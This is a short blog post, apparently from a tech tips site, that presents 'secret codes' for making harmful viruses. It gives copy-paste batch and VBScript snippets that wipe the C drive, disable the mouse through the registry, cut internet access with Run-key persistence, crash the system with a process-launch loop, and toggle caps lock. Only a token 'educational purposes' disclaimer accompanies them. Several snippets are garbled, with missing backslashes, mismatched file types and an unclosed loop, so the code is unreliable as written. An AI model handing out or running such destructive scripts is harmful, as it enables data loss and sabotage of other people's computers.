
Secret Codes To Easily Create Harmful Virus :
VIRUS can be defined as a set of codes that can destroy your system in seconds. A computer virus is a program that can easily duplicate it self into other files in computer
Note : This is for educational purposes and myonlinetechs won’t be responsible for any damages
VIRUS WHICH DELETE HARD DRIVE
To create a virus that can delete hard drive all you have to do is Open your notepad then Copy the code given below and paste it in your notepad
@Echo off
Del C:\ *.* |y
Then Save the file as virus.bat.
That’s it, just run the file and see the magic. It will delete all the content of C Drive.
VIRUS WHICH DISABLES MOUSE
It’s easy just open your notepad. Copy and paste the code in notepad.
rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————
Then Save the fille as disablemouse.batand
then run it and see for yourself
VIRUS TO DISABLE INTERNET PERMANENTLY
Copy below code and save it as DisInt.bat.
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
VIRUS TO CRASH YOUR COMPUTER SYSTEM
All you have to do is Copy and paste the code and save the file as crash.bat.
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
VIRUS TO MAKE DANCING CAPS LOCK
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
loop
Now save it as dancecap.bat.
That’s all. Don’t forget to share this post with friends and family. And don’t forget to subscribe to this site to receive updates via email when new article like this is published
Leave a Reply